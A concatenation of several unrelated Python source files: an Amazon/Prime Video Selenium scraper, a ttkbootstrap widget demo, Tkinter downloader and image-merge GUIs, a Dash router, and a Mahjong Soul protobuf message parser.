Data.append(Actors.group(0))
# scrape the type
try:
type=driver.find_element_by_xpath("/html/body//div[@id='wayfinding-breadcrumbs_feature_div']/ul/li[3]/span/a").text
except:
Data.append("")
else:
Data.append(type)
# scrape the review count
try:
comments=re.search(r"([+-]?\d+(\.\d+)?)",driver.find_element_by_id("acrCustomerReviewText").text).group(0)
except:
Data.append("")
else:
Data.append(comments)
# scrape the format
formatTag=''
try:
soup=BS(driver.find_element_by_id("bylineInfo").get_attribute('innerHTML'),'lxml')
format = soup.find(text=(u"Format: ")).find_next('span').text
except:
Data.append("")
else:
formatTag=format
Data.append(format)
# scrape the price
try:
soup=BS(driver.find_element_by_id("tmmSwatches").get_attribute("innerHTML"),'lxml')
cost = soup.find(text=formatTag).find_next('span').text
cost=re.search(r"([+-]?\d+(\.\d+)?)",cost).group(0)
except:
Data.append("")
else:
cost='$'+cost
Data.append(cost)
# scrape the rating
try:
grade=re.search(r"(?<=alt\">)(.+?)(?=out)",driver.find_element_by_css_selector("[class='a-popover-trigger a-declarative']").get_attribute('innerHTML')).group(0)
except:
Data.append("")
else:
Data.append(grade)
print("\nWebsite {} successfully downloaded".format(order))
# scrape a Prime Video page
else:
Data.append(urlOrder[0])
Data.append(URL)
Data.append(name)
Data.append(URL[-10:])
# scrape the release year
try:
ReleaseTime=driver.find_element_by_css_selector("[data-automation-id=release-year-badge]").text
except:
Data.append("")
else:
Data.append(ReleaseTime)
# scrape the runtime
try:
Time=driver.find_element_by_css_selector("[data-automation-id=runtime-badge]").text
except:
Data.append("")
else:
Data.append(Time)
try: # fetch part of the HTML
metaInfo=driver.find_element_by_id("meta-info").get_attribute('innerHTML')
except:
Data.append("")
Data.append("")
Data.append("")
Data.append("")
else:
try:
# scrape the directors
soup=BS(metaInfo,'lxml')
Director=soup.find(text=(u"Directors")).find_parent('dl').find_all(class_="_1NNx6V")
except:
Data.append("")
Data.append("")
else:
Dirs = ''
for i in Director:
Dirs += i.text
Dirs += ','
Dirs = Dirs[:-1]
Data.append(Dirs)
Data.append("")
try:
# scrape the actors
soup=BS(metaInfo,'lxml')
Actor=soup.find(text=(u"Starring")).find_parent('dl').find_all(class_="_1NNx6V")
except:
Data.append("")
else:
Acts = ''
for i in Actor:
Acts += i.text
Acts += ','
Acts = Acts[:-1]
Data.append(Acts)
try:
# scrape the genres
soup=BS(metaInfo,'lxml')
Type=soup.find(text=(u"Genres")).find_parent('dl').find_all(class_="_1NNx6V")
except:
Data.append("")
else:
types = ''
for i in Type:
types += i.text
types += ','
types = types[:-1]
Data.append(types)
# scrape the review count
try:
HTML=driver.find_element_by_css_selector("[data-automation-id=customer-review-badge]").get_attribute('innerHTML')
comments = re.search(r"(?<=nbsp;\()(.+?)(?=\)</)", HTML).group(0)
except:
Data.append("")
else:
Data.append(comments)
# scrape the format
try: # fetch part of the HTML
metaInfo = driver.find_element_by_id("btf-product-details").get_attribute('innerHTML')
except:
Data.append("")
else:
try:
soup = BS(metaInfo, 'lxml')
format = soup.find(text=(u"Format")).find_parent('dt').find_next_sibling('dd')
except:
Data.append("")
else:
Data.append(format.text)
# scrape the price
try:
firstHtml=driver.find_element_by_css_selector("[class=_2U1bmy]").get_attribute('innerHTML')
soup=BS(firstHtml,'lxml')
text=soup.find(text=(u"Buy ")).find_parent('button').text
cost=re.search(r'([+-]?\d+(\.\d+)?)',text).group(0)
except:
Data.append("")
else:
cost = "$"+cost
Data.append(cost)
# scrape the rating
try:
HTML=driver.find_element_by_css_selector("[data-automation-id=customer-review-badge]").get_attribute('outerHTML')
grade = re.search(r"(?<=Rated)(.+?)(?=out)", HTML).group(0)
except:
Data.append("")
else:
Data.append(grade)
print("\nWebsite {} successfully downloaded".format(order))
# flush the scraped data to CSV immediately
website = codecs.open(CSV, 'a+', 'utf-8') # dataset file
writer = csv.writer(website)
try:
try:
closeBrowser(driver)
except:
pass
writer.writerow(Data)
except:
print("数据异常,未能写入csv文件")
unsolvedUrl = open(UnSOLVED, "a") # URLs that could not be reached
unsolvedUrl.write("{}\n".format(URL))
unsolvedUrl.close()
else:
print("数据成功写入csv文件")
website.close()
urlOrder[0] += 1
return
# initialize file paths; each process must check its own configuration (sample files are used here)
CSV='web42000.csv' # CSV file for the scraped data
UnSOLVED='unsolvedUrl42000.txt' # txt file for URLs that could not be scraped
Rest="url_42000.txt" # file of URLs still to visit
Log="log42000.txt" # progress pointer
# initialize global variables
url=open(Rest,"r")
log=open(Log,"r")
URLLIST=url.readlines()
bannedUrl={} # URLs that failed to load
browser=[0] # browser rotation counter
urlOrder=[int(log.readline()[:-1])]
i=int(log.readline()[:-1])
url.close()
log.close()
# Spider is running
while True:
connect_to_web(URLLIST[i][:-1],i)
i+=1
log = open(Log, "w")
log.write(str(urlOrder[0])+'\n')
log.write(str(i)+'\n')
log.close()
#time.sleep(random.random()*2)
if(len(URLLIST)==i+1):
print("Task Complete")
break
``` |
{
"source": "745404527/ttkbootstrap",
"score": 2
} |
#### File: src/ttkbootstrap/__main__.py
```python
import ttkbootstrap as ttk
from ttkbootstrap.constants import *
from ttkbootstrap.dialogs import Messagebox
from ttkbootstrap.scrolled import ScrolledText
def setup_demo(master):
ZEN = """Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!"""
root = ttk.Frame(master, padding=10)
style = ttk.Style()
theme_names = style.theme_names()
theme_selection = ttk.Frame(root, padding=(10, 10, 10, 0))
theme_selection.pack(fill=X, expand=YES)
theme_selected = ttk.Label(
master=theme_selection, text="litera", font="-size 24 -weight bold"
)
theme_selected.pack(side=LEFT)
lbl = ttk.Label(theme_selection, text="Select a theme:")
theme_cbo = ttk.Combobox(
master=theme_selection,
text=style.theme.name,
values=theme_names,
)
theme_cbo.pack(padx=10, side=RIGHT)
theme_cbo.current(theme_names.index(style.theme.name))
lbl.pack(side=RIGHT)
ttk.Separator(root).pack(fill=X, pady=10, padx=10)
def change_theme(e):
t = cbo.get()
style.theme_use(t)
theme_selected.configure(text=t)
theme_cbo.selection_clear()
default.focus_set()
theme_cbo.bind("<<ComboboxSelected>>", change_theme)
lframe = ttk.Frame(root, padding=5)
lframe.pack(side=LEFT, fill=BOTH, expand=YES)
rframe = ttk.Frame(root, padding=5)
rframe.pack(side=RIGHT, fill=BOTH, expand=YES)
color_group = ttk.Labelframe(
master=lframe, text="Theme color options", padding=10
)
color_group.pack(fill=X, side=TOP)
for color in style.colors:
cb = ttk.Button(color_group, text=color, bootstyle=color)
cb.pack(side=LEFT, expand=YES, padx=5, fill=X)
rb_group = ttk.Labelframe(
lframe, text="Checkbuttons & radiobuttons", padding=10
)
rb_group.pack(fill=X, pady=10, side=TOP)
check1 = ttk.Checkbutton(rb_group, text="selected")
check1.pack(side=LEFT, expand=YES, padx=5)
check1.invoke()
check2 = ttk.Checkbutton(rb_group, text="alternate")
check2.pack(side=LEFT, expand=YES, padx=5)
check4 = ttk.Checkbutton(rb_group, text="deselected")
check4.pack(side=LEFT, expand=YES, padx=5)
check4.invoke()
check4.invoke()
check3 = ttk.Checkbutton(rb_group, text="disabled", state=DISABLED)
check3.pack(side=LEFT, expand=YES, padx=5)
radio1 = ttk.Radiobutton(rb_group, text="selected", value=1)
radio1.pack(side=LEFT, expand=YES, padx=5)
radio1.invoke()
radio2 = ttk.Radiobutton(rb_group, text="deselected", value=2)
radio2.pack(side=LEFT, expand=YES, padx=5)
radio3 = ttk.Radiobutton(
master=rb_group, text="disabled", value=3, state=DISABLED
)
radio3.pack(side=LEFT, expand=YES, padx=5)
ttframe = ttk.Frame(lframe)
ttframe.pack(pady=5, fill=X, side=TOP)
table_data = [
("South Island, New Zealand", 1),
("Paris", 2),
("<NAME>", 3),
("Maui", 4),
("Tahiti", 5),
]
tv = ttk.Treeview(master=ttframe, columns=[0, 1], show=HEADINGS, height=5)
for row in table_data:
tv.insert("", END, values=row)
tv.selection_set("I001")
tv.heading(0, text="City")
tv.heading(1, text="Rank")
tv.column(0, width=300)
tv.column(1, width=70, anchor=CENTER)
tv.pack(side=LEFT, anchor=NE, fill=X)
# # notebook with table and text tabs
nb = ttk.Notebook(ttframe)
nb.pack(side=LEFT, padx=(10, 0), expand=YES, fill=BOTH)
nb_text = "This is a notebook tab.\nYou can put any widget you want here."
nb.add(ttk.Label(nb, text=nb_text), text="Tab 1", sticky=NW)
nb.add(
child=ttk.Label(nb, text="A notebook tab."), text="Tab 2", sticky=NW
)
nb.add(ttk.Frame(nb), text="Tab 3")
nb.add(ttk.Frame(nb), text="Tab 4")
nb.add(ttk.Frame(nb), text="Tab 5")
# text widget
txt = ScrolledText(master=lframe, height=5, width=50, autohide=True)
txt.insert(END, ZEN)
txt.pack(side=LEFT, anchor=NW, pady=5, fill=BOTH, expand=YES)
lframe_inner = ttk.Frame(lframe)
lframe_inner.pack(fill=BOTH, expand=YES, padx=10)
s1 = ttk.Scale(
master=lframe_inner, orient=HORIZONTAL, value=75, from_=100, to=0
)
s1.pack(fill=X, pady=5, expand=YES)
ttk.Progressbar(
master=lframe_inner,
orient=HORIZONTAL,
value=50,
).pack(fill=X, pady=5, expand=YES)
ttk.Progressbar(
master=lframe_inner,
orient=HORIZONTAL,
value=75,
bootstyle=(SUCCESS, STRIPED),
).pack(fill=X, pady=5, expand=YES)
m = ttk.Meter(
master=lframe_inner,
metersize=150,
amountused=45,
subtext="meter widget",
bootstyle=INFO,
interactive=True,
)
m.pack(pady=10)
sb = ttk.Scrollbar(
master=lframe_inner,
orient=HORIZONTAL,
)
sb.set(0.1, 0.9)
sb.pack(fill=X, pady=5, expand=YES)
sb = ttk.Scrollbar(
master=lframe_inner, orient=HORIZONTAL, bootstyle=(DANGER, ROUND)
)
sb.set(0.1, 0.9)
sb.pack(fill=X, pady=5, expand=YES)
btn_group = ttk.Labelframe(master=rframe, text="Buttons", padding=(10, 5))
btn_group.pack(fill=X)
menu = ttk.Menu(root)
for i, t in enumerate(style.theme_names()):
menu.add_radiobutton(label=t, value=i)
default = ttk.Button(master=btn_group, text="solid button")
default.pack(fill=X, pady=5)
default.focus_set()
mb = ttk.Menubutton(
master=btn_group,
text="solid menubutton",
bootstyle=SECONDARY,
menu=menu,
)
mb.pack(fill=X, pady=5)
cb = ttk.Checkbutton(
master=btn_group,
text="solid toolbutton",
bootstyle=(SUCCESS, TOOLBUTTON),
)
cb.invoke()
cb.pack(fill=X, pady=5)
ob = ttk.Button(
master=btn_group,
text="outline button",
bootstyle=(INFO, OUTLINE),
command=lambda: Messagebox.ok("You pushed an outline button"),
)
ob.pack(fill=X, pady=5)
mb = ttk.Menubutton(
master=btn_group,
text="outline menubutton",
bootstyle=(WARNING, OUTLINE),
menu=menu,
)
mb.pack(fill=X, pady=5)
cb = ttk.Checkbutton(
master=btn_group,
text="outline toolbutton",
bootstyle=(SUCCESS, OUTLINE, TOOLBUTTON),
)
cb.pack(fill=X, pady=5)
lb = ttk.Button(master=btn_group, text="link button", bootstyle=LINK)
lb.pack(fill=X, pady=5)
cb1 = ttk.Checkbutton(
master=btn_group,
text="rounded toggle",
bootstyle=(SUCCESS, ROUND, TOGGLE),
)
cb1.invoke()
cb1.pack(fill=X, pady=5)
cb2 = ttk.Checkbutton(
master=btn_group, text="squared toggle", bootstyle=(SQUARE, TOGGLE)
)
cb2.pack(fill=X, pady=5)
cb2.invoke()
input_group = ttk.Labelframe(
master=rframe, text="Other input widgets", padding=10
)
input_group.pack(fill=BOTH, pady=(10, 5), expand=YES)
entry = ttk.Entry(input_group)
entry.pack(fill=X)
entry.insert(END, "entry widget")
password = ttk.Entry(master=input_group, show="•")
password.pack(fill=X, pady=5)
password.insert(END, "password")
spinbox = ttk.Spinbox(master=input_group, from_=0, to=100)
spinbox.pack(fill=X)
spinbox.set(45)
cbo = ttk.Combobox(
master=input_group,
text=style.theme.name,
values=theme_names,
exportselection=False,
)
cbo.pack(fill=X, pady=5)
cbo.current(theme_names.index(style.theme.name))
de = ttk.DateEntry(input_group)
de.pack(fill=X)
return root
if __name__ == "__main__":
app = ttk.Window("ttkbootstrap widget demo")
bagel = setup_demo(app)
bagel.pack(fill=BOTH, expand=YES)
app.mainloop()
``` |
{
"source": "745692208/ArtStationImageDownloader",
"score": 3
} |
#### File: ArtStationImageDownloader/src/app.py
```python
import os
import sys
import time
import webbrowser as web
from threading import Timer
from concurrent import futures
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import messagebox, filedialog
import pyperclip # pip install pyperclip
import config
import core
class App:
class RepeatingTimer(Timer):
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
def set_perclip_text(self):
text = '剪切板:{}'.format(pyperclip.paste()[0:75])
self.perclip_text.set(text.replace('\n', '').replace('\r', ''))
def open_folder(self):
try:
os.startfile(self.entry_path.get())
except Exception:
messagebox.showerror("错误", "请输入正确的文件夹路径!")
def open_latest_folder(self):
path = self.cf.load('base', 'save_path')
if path != '':
try:
os.startfile(path)
except Exception:
messagebox.showerror("错误", "往期路径不存在!")
else:
messagebox.showinfo('无最新保存', '没有保存过作品!')
def browse(self):
print('browse')
dir = os.path.normpath(filedialog.askdirectory())
if dir != '.':
self.cf.save('base', 'path', dir)
self.save_path = dir
self.entry_path.delete(0, 'end')
self.entry_path.insert(0, self.save_path)
def run(self):
core.entry_path = self.entry_path.get()
core.b_is_create_folder = self.is_create_folder.get()
core.b_is_custom_name = self.is_custom_name.get()
self.cf.save('base', 'path', self.entry_path.get())
url = pyperclip.paste()
if 'youtube' in url:
self.core_u.down_youtube(url, '', self.entry_path.get())
elif 'bilibili' in url:
self.core_u.down_video(url, self.entry_path.get())
elif 'zbrushcentral' in url:
self.core_zb.b_is_down_video = self.is_down_video.get()
self.core_zb.get_work(url)
elif 'artstation' in url:
self.core_art.b_is_down_video = self.is_down_video.get()
if 'artwork' in url: # single artwork URL, otherwise a user page
self.core_art.get_work(url)
else:
self.core_art.get_user_works(url)
def create_widget(self):
menubar = tk.Menu(self.app)
assetWeb = tk.Menu(menubar)
assetWeb.add_command(
label='ArtStion',
command=lambda: web.open('https://www.artstation.com/'))
assetWeb.add_command(
label='ZBrushcentral',
command=lambda: web.open('https://www.zbrushcentral.com/'))
assetWeb.add_command(
label='YouTube',
command=lambda: web.open('https://www.youtube.com/'))
assetWeb.add_command(
label='BiliBili',
command=lambda: web.open('https://www.bilibili.com/'))
menubar.add_command(
label='关于',
command=lambda: web.open(
'https://github.com/745692208/MultipleDownloaders'))
menubar.add_cascade(label='资源网站', menu=assetWeb)
menubar.add_command(
label='使用帮助',
command=lambda: messagebox.showinfo(
'使用帮助', self.helpText))
self.app['menu'] = menubar
# 1 row 1: tab container, create the tabs
fTab = tk.Frame(self.app)
fTab.pack(side='top', fill='x')
# 2 row 2: save path
fSave = tk.Frame(self.app)
fSave.pack(side='top', fill='x')
ttk.Label(fSave, text='Save Path').pack(side='left')
self.entry_path = ttk.Entry(fSave)
self.entry_path.pack(side='left', fill='x', expand=True)
self.entry_path.insert(0, self.save_path)
ttk.Button(fSave, text='浏览', command=self.browse).pack(side='left')
ttk.Button(fSave, text='打开文件夹', command=self.open_folder)\
.pack(side='left')
ttk.Button(
fSave, text='打开最近保存文件夹',
command=self.open_latest_folder)\
.pack(side='left')
fSave_2 = tk.Frame(self.app)
fSave_2.pack(side='top', fill='x')
self.is_custom_name = tk.IntVar()
self.is_custom_name.set(
self.cf.load('base', 'is_custom_name', 1))
ttk.Checkbutton(
fSave_2,
text='自定义命名',
variable=self.is_custom_name,
command=lambda: self.cf.save(
'base', 'is_custom_name',
str(self.is_custom_name.get())
)
).pack(side='left')
self.is_create_folder = tk.IntVar()
self.is_create_folder.set(
self.cf.load('base', 'is_create_folder', 1))
ttk.Checkbutton(
fSave_2,
text='创建文件夹',
variable=self.is_create_folder,
command=lambda: self.cf.save(
'base', 'is_create_folder',
str(self.is_create_folder.get())
)
).pack(side='left')
self.is_down_video = tk.IntVar()
self.is_down_video.set(self.cf.load(
'base', 'is_down_video', 1))
ttk.Checkbutton(
fSave_2,
text='下载视频',
variable=self.is_down_video,
command=lambda: self.cf.save(
'base', 'is_down_video',
str(self.is_down_video.get())
)
).pack(side='left')
ttk.Button(
fSave_2,
text='自动分析链接并爬取',
command=lambda: self.executor_ui.submit(
self.run)
).pack(side='left', fill='x', expand=1)
# 4 row 4: logs panel
self.fLogs = ttk.LabelFrame(self.app, text='Logs')
self.fLogs.pack(side='top', fill='both', expand=1)
self.perclip_text = tk.StringVar()
ttk.Label(self.fLogs, anchor='w', textvariable=self.perclip_text)\
.pack(side='top', fill='x')
fLogs_box = ttk.Frame(self.fLogs)
fLogs_box.pack(side='left', fill='both', expand=1)
self.logs_box = tk.Text(fLogs_box)
self.logs_box.pack(side='left', fill='both', expand=1)
self.logs_box.configure(state="disabled")
self.logs_box.focus()
# scrollbar for the logs panel
scrollbar = ttk.Scrollbar(fLogs_box)
scrollbar.pack(side='left', fill='y')
scrollbar.config(command=self.logs_box.yview)
self.logs_box.config(yscrollcommand=scrollbar.set)
def app_log(self, value):
time_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
value = '[{}]{}'.format(time_date, value)
self.logs_box.configure(state="normal")
self.logs_box.insert('end', value + '\n')
self.logs_box.see('end')
self.logs_box.configure(state="disabled")
def __init__(self, title, ver, suffix):
self.helpText = '\1、网址复制到剪切板,会自动读取并分析和爬取资源。\
\n2、下载视频选项只影响A站和ZB站的资源爬取。\
\n3、目前支持A站、ZB站、B站的资源下载。'
self.cf = config.Config('MultipleDownloaders', 0, './test/')
core.cf = self.cf
core.Utils(self.app_log)
self.core_zb = core.ZBrush()
self.core_art = core.ArtStation()
self.core_u = core.Utils()
self.executor_ui = futures.ThreadPoolExecutor(1)
self.app = tk.Tk()
self.app.title('{} {} {}'.format(title, ver, suffix))
# variables
self.ftab_list = []
self.save_path = self.cf.load('base', 'path')
self.tab_index = tk.IntVar()
self.tab_index.set(self.cf.load('base', 'tab_index', 0))
# run
self.create_widget()
# self.changeTab()
self.t = self.RepeatingTimer(1, self.set_perclip_text)
self.t.start()
if __name__ == '__main__':
app = App('Test', '', '')
app.app.mainloop()
app.t.cancel()
sys.exit()
``` |
{
"source": "745692208/ImageMergeTool",
"score": 3
} |
#### File: ImageMergeTool/src/ImageMergeTool.py
```python
from tkinter import ttk
from tkinter import filedialog, messagebox
import tkinter as tk
import webbrowser as web
import time
import sys
import os
import PIL.Image as Image
import config
class core:
def __init__(self):
self.cf = config.Config('', 1, '')
self.path = ''
self.image_format = ['.png', '.PNG', '.jpg', '.JPG']
def convert_image_path(self, image_path_list):
a = []
for str in image_path_list:
a.append(str.rsplit('/', 1)[1])
return a
def get_dir_images_path(self, path):
'''Output example: yangchen0927-485gn2-1.jpg'''
try:
image_names = [
name for name in os.listdir(path) for item in self.image_format
if os.path.splitext(name)[1] == item
]
except Exception as e:
print("没有找到文件夹", e)
messagebox.showerror("错误", "请输入正确的文件夹路径")
return
return image_names
def merge_image(
self, path, images_path, name,
b_OkOpen, b_DelOldFile, b_create_folder, b_add_date):
# 防止没有图片或图片太少问题
if len(images_path) < 2:
messagebox.showerror("错误", "路径里没有合适的图片")
return
# 创建new文件夹并设置path
path = path + '\\'
save_path = path
if b_create_folder:
save_path = os.path.join(path, 'new\\')
os.makedirs(save_path, exist_ok=True)
# self.cf.save('base', 'latest_path', path)
print('最终路径', path)
# append the date to the new image name
if b_add_date:
time_date = time.strftime("%y-%m-%d")
name = '{}_{}.png'.format(name, time_date)
else:
name = '{}.png'.format(name)
# merge the images
print(path + name)
image_num = len(images_path) # total number of images
image_size = Image.open(path + images_path[0]).size # size of the first image
new_image = Image.new(
'RGB', (image_size[0] * image_num, image_size[1])) # create a blank canvas
for i, image in enumerate(images_path):
image_obj = Image.open(path + image)
new_image.paste(image_obj, (i * image_size[0], 0))
new_image.save(save_path + name) # save the image, e.g. d:\asd\1.jpg
# open the folder containing the merged image
if b_OkOpen:
os.startfile(save_path)
# delete the original files
if b_DelOldFile:
for image in images_path:
os.remove(path + image)
class App:
def __init__(self, title, ver, suffix):
self.cf = config.Config(title, 0, './')
self.core = core()
self.core.cf = self.cf
# GUI
self.app = tk.Tk()
self.app.title('{} {} {}'.format(title, ver, suffix))
self.tab_index = tk.IntVar()
self.tab_index.set(self.cf.load('base', 'tab_index', 0))
self.entry_path = tk.StringVar()
self.entry_path.set(self.cf.load('base', 'entry_path'))
self.name = tk.StringVar()
self.name.set(self.cf.load('base', 'name', 'new'))
self.b_add_date = tk.IntVar()
self.b_add_date.set(self.cf.load('base', 'b_add_date', '1'))
self.b_DelOldFile = tk.IntVar()
self.b_DelOldFile.set(self.cf.load('base', 'b_DelOldFile', '0'))
self.b_OkOpen = tk.IntVar()
self.b_OkOpen.set(self.cf.load('base', 'b_OkOpen', '1'))
self.b_create_folder = tk.IntVar()
self.b_create_folder.set(self.cf.load('base', 'b_create_folder', '1'))
self.select_num_hint = tk.StringVar()
self.select_num_hint.set('共选择:0 张图片')
self.ftab_list = []
self.create_widget()
self.changeTab()
def merge_image(self, images, path):
self.core.merge_image(
path, images, self.name.get(),
self.b_OkOpen.get(), self.b_DelOldFile.get(),
self.b_create_folder.get(), self.b_add_date.get()
)
def run(self):
self.cf.save('base', 'entry_path', self.entry_path.get())
self.cf.save('base', 'name', self.name.get())
if self.tab_index.get() == 0:
images = self.core.convert_image_path(self.select_images)
self.merge_image(images, self.select_images[0].rsplit('/', 1)[0])
elif self.tab_index.get() == 1:
images = self.core.get_dir_images_path(self.entry_path.get())
self.merge_image(images, self.entry_path.get())
def check_menu(self):
web.open('https://github.com/745692208/ImageMergeTool')
def select_files(self):
files = filedialog.askopenfilenames(
title="Select Image file",
filetypes=(("Image", "*.png *.jpg"),)
)
self.select_images = files
self.select_num_hint.set('共选择:{} 张图片'.format(len(files)))
print(files)
def browse(self):
print('browse')
dir = os.path.normpath(filedialog.askdirectory())
if dir != '.':
self.cf.save('base', 'entry_path', dir)
self.entry_path.set(dir)
def open_folder(self):
try:
os.startfile(self.entry_path.get())
except Exception:
messagebox.showerror("错误", "请输入正确的文件夹路径!")
def changeTab(self):
index = self.tab_index.get()
self.cf.save('base', 'tab_index', str(index))
self.lf_option.pack_forget()
for ftab in self.ftab_list:
ftab.pack_forget()
self.ftab_list[index].pack(fill='x')
self.lf_option.pack(side='top', fill='x')
def create_widget(self):
# GUI初始化
menubar = tk.Menu(self.app)
menubar.add_command(label='关于', command=self.check_menu)
self.app['menu'] = menubar
# 1 row 0: tab container, create the tabs
fTab = tk.Frame(self.app)
fTab.pack(side='top', fill='x')
for i, name in enumerate(['选择图片', '选择文件夹']):
ttk.Radiobutton(
fTab, text=name, value=i,
variable=self.tab_index, command=self.changeTab)\
.pack(side='left')
# row 1: content
# file selection
lf_select = ttk.LabelFrame(self.app, text='Select Image')
lf_select.pack(side='top', fill='x')
self.ftab_list.append(lf_select)
tk.Label(lf_select, textvariable=self.select_num_hint, anchor='w')\
.pack(side='left', fill='x', expand=1)
ttk.Button(lf_select, text='选择文件', command=self.select_files)\
.pack(side='left')
# path
lf_path = ttk.LabelFrame(self.app, text='Path')
lf_path.pack(side='top', fill='x')
f_path = tk.Frame(lf_path)
f_path.pack(side='top', fill='x')
self.ftab_list.append(lf_path)
tk.Label(f_path, text='文件夹路径:').pack(side='left')
ttk.Entry(f_path, textvariable=self.entry_path, width=50)\
.pack(side='left', fill='x', expand=1)
ttk.Button(f_path, text='浏览', command=self.browse)\
.pack(side='left')
ttk.Button(lf_path, text='打开文件夹', command=self.open_folder)\
.pack(side='left', fill='x', expand=1)
# row 2: options
self.lf_option = ttk.LabelFrame(self.app, text='Option')
self.lf_option.pack(side='top', fill='x')
f_name = ttk.Frame(self.lf_option)
f_name.pack(side='top', fill='x')
tk.Label(f_name, text='Name:').pack(side='left')
ttk.Entry(f_name, textvariable=self.name)\
.pack(side='left', fill='x', expand=1)
ttk.Checkbutton(
f_name, text='添加日期', variable=self.b_add_date,
command=lambda: self.cf.save(
'base', 'b_add_date', self.b_add_date.get()))\
.pack(side='left')
lf_cb = tk.Frame(self.lf_option)
lf_cb.pack(side='top', fill='x')
ttk.Checkbutton(
lf_cb, text='删除旧文件', variable=self.b_DelOldFile,
command=lambda: self.cf.save(
'base', 'b_DelOldFile', self.b_DelOldFile.get()))\
.pack(side='left')
ttk.Checkbutton(
lf_cb, text='创建New文件夹', variable=self.b_create_folder,
command=lambda: self.cf.save(
'base', 'b_create_folder', self.b_create_folder.get()))\
.pack(side='left')
ttk.Checkbutton(
lf_cb, text='完成后打开文件夹', variable=self.b_OkOpen,
command=lambda: self.cf.save(
'base', 'b_OkOpen', self.b_OkOpen.get()))\
.pack(side='left')
lf_button = tk.Frame(self.lf_option)
lf_button.pack(side='top', fill='x')
# ttk.Button(lf_button, text='打开最后文件夹').pack(side='left')
ttk.Button(lf_button, text='合并', command=self.run)\
.pack(side='left', fill='both', expand=1)
if __name__ == '__main__':
app = App('ImageMergeTool', '2.0.1', '')
app.app.mainloop()
app.app.quit()
sys.exit()
``` |
{
"source": "747470666/mouxiu",
"score": 2
} |
#### File: 747470666/mouxiu/app.py
```python
from dash import dcc
from dash import html
from dash.dependencies import Input, Output
# ==============================================================
# app的初始化,自动引入assets中的所有资源
from core import app
# import the custom framework and components
from tools.structure import PageStruct
import tools.router as router
# ==============================================================
# initialization
# page structure initialization
# switch: on/off
# default style: string (custom styles can be designed)
mySetting = {
'main': 'simple',
'head': {
'style': 'simple',
},
'body': {
'style': 'simple',
},
'foot': {
'style': 'simple',
},
}
# structure initialization
page_struct = PageStruct(mySetting)
# ==============================================================
# app entry point
app.layout = html.Div(id='app', className=mySetting['main'], children=[
dcc.Location(id='url', refresh=False),
html.Meta(name='viewport', content="initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes"),
html.Div(id='page')
])
# ==============================================================
# define the router callback
@app.callback(Output('page', 'children'),
Input('url', 'pathname'))
def display_page(pathname):
return router.route_page(pathname)
server = app.server
# ==============================================================
# run the main function
if __name__ == '__main__':
# app.run_server(debug=True)
app.run_server(debug=False)
```
#### File: mouxiu/tools/router_setting.py
```python
from src.pages.index import index_page
from src.pages.research import research_page
from src.pages.about import about_page
# a bidirectional dict is built below, so there must be no duplicate names
pathname_setting = ['/', '/research', '/about']
pagename_setting = ['主页', '研究', '关于']
tab_dict = {}
tab_id = []
for i in range(len(pathname_setting)):
tab_id.append('page' + str(i))
# map both directions
tab_dict[pathname_setting[i]] = tab_id[i]
tab_dict[tab_id[i]] = pathname_setting[i]
def get_router_setting():
return pathname_setting, pagename_setting, tab_id, tab_dict
page_index_dict = {}
for i in range(len(pathname_setting)):
page_index_dict['page' + str(i)] = i
def get_router_page(style, page_index):
pages_list = [
index_page(style), research_page(style), about_page(style)
]
return pages_list[page_index_dict[page_index]]
``` |
{
"source": "747929791/majsoul_wrapper",
"score": 2
} |
#### File: 747929791/majsoul_wrapper/liqi.py
```python
import os
import sys
import time
import json
import struct
import pickle
import random
import argparse
from xmlrpc.client import ServerProxy
import base64
from enum import Enum
import importlib
from typing import List, Tuple, Dict
from google.protobuf.json_format import MessageToDict
try:
from .proto import liqi_pb2 as pb
except:
from proto import liqi_pb2 as pb
class MsgType(Enum):
Notify = 1
Req = 2
Res = 3
class LiqiProto:
def __init__(self):
# parse the WebSocket message queue of one game
self.tot = 0 # total number of packets parsed so far
# (method_name:str,pb.MethodObj) for 256 sliding windows; req->res
self.res_type = dict() # int -> (method_name,pb2obj)
self.jsonProto = json.load(
open(os.path.join(os.path.dirname(__file__), 'proto/liqi.json'), 'r'))
def init(self):
self.tot = 0
self.res_type.clear()
def parse(self, flow_msg) -> bool:
# parse one WS flow message; frames must be parsed in order
buf = flow_msg.content
from_client = flow_msg.from_client
result = dict()
msg_type = MsgType(buf[0]) # message type
if msg_type == MsgType.Notify:
msg_block = fromProtobuf(buf[1:]) # parse the remaining message structure
method_name = msg_block[0]['data'].decode()
"""
msg_block is usually structured as
[{'id': 1, 'type': 'string', 'data': b'.lq.ActionPrototype'},
{'id': 2, 'type': 'string','data': b'protobuf_bytes'}]
"""
_, lq, message_name = method_name.split('.')
liqi_pb2_notify = getattr(pb, message_name)
proto_obj = liqi_pb2_notify.FromString(msg_block[1]['data'])
dict_obj = MessageToDict(proto_obj)
if 'data' in dict_obj:
B = base64.b64decode(dict_obj['data'])
action_proto_obj = getattr(pb, dict_obj['name']).FromString(B)
action_dict_obj = MessageToDict(action_proto_obj)
dict_obj['data'] = action_dict_obj
msg_id = self.tot
else:
msg_id = struct.unpack('<H', buf[1:3])[0] # little-endian message id (0~65535)
msg_block = fromProtobuf(buf[3:]) # parse the remaining message structure
"""
            msg_block typically has the structure:
[{'id': 1, 'type': 'string', 'data': b'.lq.FastTest.authGame'},
{'id': 2, 'type': 'string','data': b'protobuf_bytes'}]
"""
if msg_type == MsgType.Req:
assert(msg_id < 1 << 16)
assert(len(msg_block) == 2)
assert(msg_id not in self.res_type)
method_name = msg_block[0]['data'].decode()
_, lq, service, rpc = method_name.split('.')
proto_domain = self.jsonProto['nested'][lq]['nested'][service]['methods'][rpc]
liqi_pb2_req = getattr(pb, proto_domain['requestType'])
proto_obj = liqi_pb2_req.FromString(msg_block[1]['data'])
dict_obj = MessageToDict(proto_obj)
